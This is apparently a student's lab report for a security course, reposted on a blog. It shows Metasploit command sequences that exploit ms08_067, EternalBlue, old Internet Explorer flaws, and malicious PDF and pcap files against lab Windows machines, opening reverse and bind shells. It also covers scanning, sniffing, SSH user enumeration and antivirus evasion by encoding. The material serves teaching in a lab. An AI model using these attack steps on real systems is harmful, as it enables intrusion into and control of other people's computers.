• Exp6 MSF应用基础


    @

    Exp6 MSF应用基础

    一、实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
    
      1.1一个主动攻击实践,尽量使用最新的类似漏洞; (1分)
    
      1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)
    
      1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)
    
      1.4 成功应用任何一个辅助模块。(1分)
    
      以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。
    

    二、实验原理

    MSF是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

    • MSF的六个模块:
      查看六种模块源码目录/usr/share/metasploit-framework/modules
      渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
      辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
      攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
      空字段模块Nop Modules
      编码模块Encoders
      后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    MSF常用漏洞利用命令:

     search name :用指定关键字搜索可以利用的漏洞模块
     use exploit name :使用漏洞
     show options :显示配置选项
     set TARGET target number :设置目标版本
     exploit :开始漏洞攻击
     sessions -l :列出会话
     sessions -i id :选择会话
     sessions -k id :结束会话
     Ctrl+z :把会话放到后台
     Ctrl+c :结束会话
    

    三、实验过程

    (一)主动攻击实践

    1.攻击方式:ms08_067

    靶机:Windows XP
    具体步骤:
    Windows xp的IP:192.168.64.151 kali的IP:192.168.64.130, XPping一下kali

    启动 msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi

    输入指令 use exploit/windows/smb/ms08_067_netapi进入攻击模块,使用show payloads,查看能够使用的payloads

    使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接
    参数设置:

    set RHOST 192.168.64.151 //设置靶机IP (winxp ip)
    set LPORT 1213  //设置攻击机端口
    set LHOST 192.168.64.130//设置攻击机IP (kali ip)
    exploit
    


    回连成功之后输入ipconfig查看信息


    和winxp中的ip相同
    输入net user查看Winxp目前的用户名

    2.攻击方式:ms08_067

    靶机:Windows 2000(ip:192.168.64.152)
    具体步骤:
    攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP

    存在漏洞信息

    use exploit/windows/smb/ms08_067_netapi //选择该漏洞
    set payload generic/shell_reverse_tcp //设置攻击的载荷
    set RHOSTS 192.168.64.152 //靶机IP 设置靶机IP
    set LHOSTS 192.168.64.130 //的IP 设置攻击机IP
    exploit 进行攻击
    


    测试攻击,获得靶机权限之后输入ipconfigdir测试一下

    3.攻击方式:ms17_010_eternalblue

    ms17-010 永恒之蓝漏洞
    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,随后不法分子通过改造永恒之蓝漏洞制造出了wannacry勒索病毒。
    靶机:Microsoft Windows 7 x64 (192.168.64.140)
    具体步骤:
    关闭虚拟机的防火墙
    kali上输入命令:

    msfconsole
    use auxiliary/scanner/smb/smb_ms17_010 //选择攻击漏洞
    set RHOSTS 192.168.64.140 //靶机ip 输入靶机ip
    exploit //对靶机扫描,看是否存在漏洞。下图所示,即为存在漏洞
    

    use exploit/windows/smb/ms17_010_eternalblue 选择该漏洞
    set payload windows/x64/meterpreter/reverse_tcp 设置攻击的载荷
    set RHOSTS 192.168.64.140 靶机IP //设置靶机IP
    set LHOSTS 192.168.64.130 kali的IP //设置攻击机IP
    exploit //进行攻击
    


    测试攻击,获得靶机权限之后输入ipconfig测试一下

    (二)针对浏览器的攻击(靶机:Windows XP SP2)

    1.攻击方式:ms10_018+bind_tcp

    设置参数

    use exploit/windows/browser/ms10_018_ie_behaviors
    set payload windows/meterpreter/bind_tcp
    set RHOST 192.168.64.153
    set target 0
    exploit
    


    在靶机浏览器中输入 http://192.168.64.130:8080/QczXmBaPSioQfu浏览器会直接关闭

    回连成功,输入ver查看版本

    2.攻击方式:ms06_013_createtextrange

    设置参数:

    use exploit/windows/browser/ms06_013_createtextrange
    set payload windows/meterpreter/reverse_tcp
    set RHOST 192.168.64.153
    set target 0
    exploit
    


    在靶机浏览器中输入http://192.168.64.130:8080/W4xAzyDjs7gX
    网页会从0跑到100,然后浏览器会无法响应

    输入sessions -i 2进入靶机(shell路径和上次不一样),输入ver查看系统版本,dir查询目录

    靶机的IE浏览器就陷入崩溃,关不掉了

    (三)针对客户端的攻击

    1.攻击方式:Adobe(adobe_cooltype_sing)

    靶机:Windows XP
    具体步骤:
    进入kali输入如下指令

    msfconsole //进入控制台
    search adobe //进行查找
    use windows/fileformat/adobe_cooltype_sing  //使用漏洞
    info //查看漏洞具体信息
    set payload windows/meterpreter/bind_tcp //选择攻击载荷
    show options //查看详细信息
    set LPORT 1213//设置端口号
    set RHOST 192.168.64.153 靶机IP//设置靶机IP地址 
    exploit #攻击
    


    此时生成msf.pdf,进入保存目录/root/.msf4/local/寻找msf.pdf,复制到共享文件夹中,在移到windowsXP虚拟机中

    下一个Adobe reader打开这个pdf文件

    回到kali中开始监听靶机

    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/bind_tcp  //选择攻击载荷
    show options //查看详细信息
    set RHOST 192.168.64.153 靶机IP //设置靶机IP地址
    set LPORT 1213 //设置端口号
    exploit //攻击
    

    打开靶机,打开pdf文件

    回到kali,回连成功

    2.wireshark

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    use windows/fileformat/wireshark_packet_dect
    set payload windows/meterpreter/reverse_tcp //tcp反向回连
    set LHOST 192.168.64.130 //攻击机ip
    set LPORT 1213 //攻击端口
    set FILENAME 20191213.pcap //设置生成pcap文件的名字
    exploit //攻击
    


    将生成的pcap文件拷贝到靶机上。在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
    show options //查看详细信息
    set LHOST 192.168.64.130
    set LPORT 1213 //设置端口号
    exploit //攻击
    

    之后在靶机wireshark中打开20191213.pcap,就可以看到Kali已经回连成功了:

    (四)成功应用任何一个辅助模块

    1.攻击方式:ipidseq

    靶机:Windows XP
    该模块将探测主机的IPID序列,并使用相同的方法对IPID空闲扫描(-SI)和0秒检测(-0)进行分类。Nmap的空闲扫描可以使用其IPID序列被分类为增量或断小端增量的主机。
    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    use auxiliary/scanner/ip/ipidseq
    show options //查看选项
    set RHOSTS 192.168.64.150-192.168.64.160//目标地址范围
    set TIMEOUT 5//超时设置
    exploit
    


    192.168.64.150-192.168.64.160ip地址中,192.168.64.153为主机windows XP的IP地址,成功扫描,并把它归为IPID序列递增主机

    2.攻击方式:sniffer(嗅探)

    靶机:Windows XP
    在kali的msfconsole中输入以下代码

    search sniff //看一下嗅探的攻击
    use auxiliary/sniffer/psnuffle //选择攻击操作
    show options
    exploit
    


    只要在靶机上访问IE浏览器都会被嗅探到

    3.攻击方式:ssh_enumusers

    靶机:Windows XP
    输入cd /usr/share/metasploit-framework/modules/auxiliary目录下查看Aux模块
    打开msfconsole控制台,输入以下的参数:

    use auxiliary/scanner/ssh/ssh_enumusers //启用相应模块
    show options //查看参数设置
    (这里可以先输入info查看该模块的具体说明,本模块的作用是发送格式错误的数据包或计时攻击来枚举OpenSSH服务器上的用户。测试会记录无效用户)
    set RHOSTS 192.168.64.153 //设置目标地址
    set RPORT 1213 //设置端口
    set THREADS 50 //设置攻击线程
    set THRESHOLD 2 //大致是设置找到用户前需要的秒数
    set USERNAME lyd //设置猜测用户名
    run //启动
    

    4.攻击方式:portscan(端口扫描)

    靶机:Windows XP
    具体步骤:
    可以 search portscan 命令搜索相关的端口扫描脚本
    在kali中输入如下的代码

    search portscan //看看可以扫什么端口
    use auxiliary/scanner/portscan/tcp // 选择tcp脚本
    set Rhosts 192.168.64.153 //设置靶机IP
    set threads 20
    show options //看一下配置文件
    run
    


    四、问题回答

    1.用自己的话解释什么是exploit,payload,encode

    • exploit是渗透攻击,这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块,用户可以调用某一个连接漏洞对靶机进行攻击,将payload传送到靶机中。
    • payload是载荷,是攻击者用来与系统交互的简单脚本,exploit把它送到靶机中后,是真正负责进行攻击代码。
    • encode是编码,可以通过编码来消除类似0x00等漏洞无法处理的字符,来改变payload;还可以实现免杀,比如伪装特征码,本来容易被靶机安全软件所察觉,用了这个编码器中的编码后就打乱了特征码,从而迷惑靶机,不让杀毒软件很轻易的就发现payload是攻击代码。

    五、离实战还缺些什么技术或步骤

    1.对靶机的版本漏洞的理解要求特别高,不管是系统版本还是软件的版本,如何找到靶机存在的未修复漏洞是重点
    2.在攻击过程中,如何诱导被攻击者打开我们想要他打开的网址和客户端,需要借助社会学攻击的手段

    六、实验心得

    本次实验是对MSF应用的一种锻炼,通过使用多种攻击方式对MSF有了一个大概的了解,在这个过程中学到了不少攻击手段,也遇到了一些困难。对于不同操作系统的靶机而言,每个漏洞都是不一样的,而且随着时代的进步,过去的漏洞大多数随着操作系统的更新都被修复了,而新的漏洞我们暂时没有能力发现,实验过程中用的漏洞的年限都比较久远,所攻击的系统也是Windows 2000,XP,win7这些古老的系统,但是这也提醒我们操作系统始终都是存在漏洞的,新的操作系统相对安全但并不意味着现在用的最新系统就没有漏洞就不会有人攻击,还是需要我们用安全防护手段不断努力完善,提高警惕不踩中陷阱。

  • 相关阅读:
    Visual Studio调试托管代码
    Visual Studio调试本机代码
    Visual Studion调试器指南---编辑并继续
    Visual Studio 调试器指南---调试器中的表达式
    Visual Studio 调试器指南---查看调试器中的数据
    Visual Studio调试器指南---断点和跟踪点
    Visual Studio调试器指南---转储文件
    Visual Studio调试器指南---自动启动调试器
    Visual Studio调试器指南---实时调试
    Visual Studio调试器指南---使用线程和进程
  • 原文地址:https://www.cnblogs.com/1301cn/p/16220587.html
Copyright © 2020-2023  润新知